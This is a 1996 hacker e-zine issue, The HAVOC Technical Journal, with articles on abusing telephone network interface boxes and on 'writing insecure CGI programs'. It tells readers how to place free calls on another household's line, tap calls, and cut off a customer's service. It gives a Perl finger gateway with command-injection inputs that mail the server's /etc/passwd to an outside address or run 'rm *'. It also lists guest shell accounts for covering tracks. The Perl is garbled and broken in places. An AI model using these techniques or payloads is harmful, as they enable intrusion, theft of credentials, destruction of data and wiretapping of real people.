The HAVOC Technical Journal

Vol. 1 | No.4 | October 1st, 1996 | A HAVOC Bell Systems Publication

"Protected by the First Amendment"


Inside this issue:

Whats new this issue
Editorial
The Network Identification Device Pt. 1
Writting Inscure CGI Progs
The End of penet.fi
ROLL CALL & more!
Next Month
All by Scud-O
Download a copy of issue 4
Go back to the index
	
       (I need more writers!!! e-mail me if ya want to write an article!
        my e-mail is: FoxMulder@worldnet.att.net (yes its back up..)
        the mags e-mail is: thtj@juno.com (wheee.. we get to read ads as
        we get your e-mail!) )

        This months music supplied by: Sublime, The Future Sound of London
        and Zion Train and Violent Femmes. Oh yea.. and WHFS 99.1 !

What's new in this issue:

	 Back to the table of contents
        Well if you weren't so cheap you would see our nice new format! but
        the online version has none of that neatness.. My new school has a
        lab with a scanner so the print version should get some nice pics
        soon...
        Also Scud-O is now on IRC often.. Im on #phreak and #hacker often on
        undernet.. to c'mon in and join us for a chat...
        If ya want a print version and some extra goodies... e-mail me!

       -----------------------------------------------------------
       How to contact us:
        Check Out Our Web Site:
         www.geocities.com/SiliconValley/8805/
         my (Scud-O)  e-mail is : FoxMulder@worldnet.att.net
         our Mag e-mail is : thtj@juno.com
         HELLCORE's e-mail is : hellcore@juno.com
      ---------------------------------------------------------------

Editorial:

Back to the Table of Contents
        by Scud-O

Well another month another issue.. but hey if ya had the print version you
would see our nice new format.. its kind of slick... were still messing
around so it can only get better...Welp on to bigger and other things...
lately i've been hit with ALOT of lamers.. (I gots ops on #hacker, thats why)
(sometimes on #phreak as well...) well anyway.. EVERY lamer on #hacker was
like 'teach me' so i relpied 'on what?' they came back with 'everything' so
i said 'get some manuals and RTFM' and they all replied 'what?' .. people
this is PATHETIC!! We need to protect ourselves from these newbies! any
suggestions? e-me: FoxMulder@worldnet.att.net

The Network Identification Device (NID) Pt.1

Back to the Table of Contents
        by Scud-O

These days it seems that NIDs have been left unabused when they are a great
device to mess with. Why you ask? Well, there are many things you can to with
them. But first where can you find them? well every house has one! My house
has an old one, but most new ones I see are the size of a sunglass case
which have a 7/16 inch socket screw in them. There are also some bigger ones
( usually in houseing complexes) that have a user opening and a telco opening.

A little history:
        The NID was created to for test purposes. The NID is the main
connection from Bell to the houses lines. You can test this NID to see if
Bells lines are fucked or if your lines are fucked. If you live in
Bell Atlantic area, their White Pages have some info on NIDS.

Back to the article:
        The NID can be used for many purposes:
1. Free phone calls: Inside the NID there is a jack and a plug. If you unplug
the jack and stick a phone in the plug you can then make calls free of
charge, but the lines restrictions still apply (900 block, call waiting, etc)
To find the line number just use your trusty ANI. And since the jack in the
NID is out, the customer can't interupt you and make a call. Or you can find
a 2 jack to one converter (they sell em in Radio Shack.. its so you can put
more than one phone in a jack) and plug it all together so they can still
make calls.
2. Phone tap: This is just a modification of the 2 to 1 jack converter, just
wait for a call.. you cant leave the phone off the hook.. well because it
will go off the hook... (hmm... maybe next month I'll find out how to be able
to listen 24 hours a day...)
3. Disconnect customer: did some one piss you off? we just open their NID and
unplug the jack and leave... no service... it will take a few days to get
service and they are just totally fucked then... hehehehehehe...

Next Month: read as I steal a NID and slice and dice it!! also: more fun
tricks!


Writting Insecure CGI Progs:

Back to the Table of Contents
        by Scud-O

CGI programs really are wonderful.. you can easily give them information
that we shouldn't have!

What follows is a simple CGI prog that you can install to get the servers
password file! The program is actually a finger gateway.. but who cares..
next month or maybe this month I'll print the secure source code to show a
webmaster or sysadmin...

Here's the HTML code:
	(NOTE: take out the extra '<'s ! had to do it.. otherwise the
	HTML was fucked in this file! )

        <
< < <
Here's the actual CGI Perl Prog: #!/usr/local/bin/perl &parse_form_data(*simple); $user = $simple{'user'}; print "Content-type: text/plain", "\n\n"; print "Here are the results of your query: "\n"; print '/usr/local/bin/finger $user'; print "\n"; exit (0); the parse_form_data sub: (NOTE: ya need this to trasnlater the info for both progs.. other wise ya fucked! ) sub parse_form_data { local(*FORM_DATA) = @_; local( $request_method, $query_string, @key_value_pairs, $key_value, $key, $value); $request_method = $ENV('REQUEST_METHOD'); if ($request_method eg "GET") { $query_string = $ENV{'QUERY_STRING'}; } elsif ($request_method eg "POST") { $query_string = $ENV{'CONTENT_LENGTH'}; } else { &return_error (500, "Server Error', "Server uses unsupported method"); } @key_value_pairs = split (/&/, $query_string); foreach $key_value (@key_value_pairs) { ($key, $value) = split (/=/, $key_value); $value =~ tr/+/ /; $value =~ s/%([\dA-Fa-f][\dA-Fa-f])/pack ("C", hex ($1))/eg; if (defined($FORM_DATA{$key})) { $FORM_DATA{$key} = join("\0", $FORM_DATA{$key}, $value); } else { $FORM_DATA{$key} = $value; } } the return_error sub: (NOTE: ya need this for the parse sub, and the patched version! ) (NOTE: TAKE OUT THE Extra '<'s below.. had to do it.. otherwise the HTML in this file was all fucked! ) sub return_error { local($status, $keyword, $message) =@_; print "Content-type: text/html", "\n"; print "Status: ", $status, " ", $keyword, "\n\n"; print << End_of_Error; <Unexpected Error! <

$keyword

<
$message Please contact $webmater for more information. End_of_Error exit(1); } So thats it! below is the patched source: #!/usr/local/bin/perl &parse_form_data(*simple); $user = $simple{'user'}; if($user =~ /[;><&\*'\|]) { &return_error(500, "CGI Finger Alert", "What are you trying to do?"); } else { print "Content-type: text/plain", "\n\n"; print "Here are the results of your query: "\n"; print '/usr/local/bin/finger $user'; print "\n"; } exit (0);
So what you aske.. we the first one if you type:
 ; mail -s "passwords!"  you@yourdomain.com < /etc/passwd
 then you get yourslef a copy of the server's password lists being mailed to
 you!
 or try:
        ; rm *
and delete their directory of files!

The End of penet.fi :

Back to the Table of Contents
        by Scud-O
Well the pressure was finally too much, as penet.fi will no longer give out
anonymous e-mail. But the people that already have addresses can still send
stuff. But newsgroup post aren't allowed anymore... but you can still get
anon news posts. So what will happen? well I think hacking penet emails will
be fun for a while, but we will all start getting Juno accounts.. the're free
 you can forge them,  and they are dissposible, but you have to read e-mail,
 click thru a list of hobbies, etc, and  more and then your e-mails get adds
 in them... oh well though...

ROLL CALL & More!

Back to the Table of Contents

Who is HAVOC?

        Scud-O : Pope boy
        Psycho : Fag Vice Pope
        Pinky  : In hidding
        Rotten : Moving fool
        Sid    : Other Moving Fool  (and the're twins as well! )

        Want to join? next month we got a sign up sheet!

Cool People:

        |\|\cFill
        theLURK7R (sometimes theLURK3R )
        JKMG-Boba ( aka Boba)
        Alef
              all on IRC!

This Month Question:

	We ask why has |)eadLoss\Mulder changed his name?
        Well.. some knew me as |)eadLoss ,  some as Mulder, so I
        combined the 2.. but people we ever more confused, so I said fuck em!
        and I changed it to Scud-O .. Scud-O is a cool guy..

  Next Month's Question: Who is Scud-O ?

Next Month:

Back to the Table of Contents
        This MANY be what we will have in issue 5
        We have more on the NID
        Virus Theory Pt.2
        More Virus Stuff
        RTFM: The lamer Journal
        Whats up in the HELLCORE Labs?
        Pager Talk
        AND MUCH MORE TBA !

                Issue 5 is out Oct. 31st!

 cya ya next issue! -Scud-O


Wait! we have a bonus:
        Some shell accounts to use to cover your ass:

Freenet accounts:			login

freenet.buffalo.edu     		guest
freenet.hsc.colorado.edu		guest
heartland.bradley.edu			bbguest
freenet.lorain.oberlin.edu		guest
freenet.victoria.bc.ca			guest
cbos.uc.edu				visitor
yfn.ysu.edu				visitor
freenet-in-a.cwru.edu			fnguest
	   b
	   c

------------------------
Okay that is all!

============================================================
= IS this copy of The HAVOC Technical Journal Skunked?
= If this file reads larger than 11078 bytes than this issue
= has been messed with! get a fresh copy from our site:
= www.geocities.com/SiliconValley/8805/
============================================================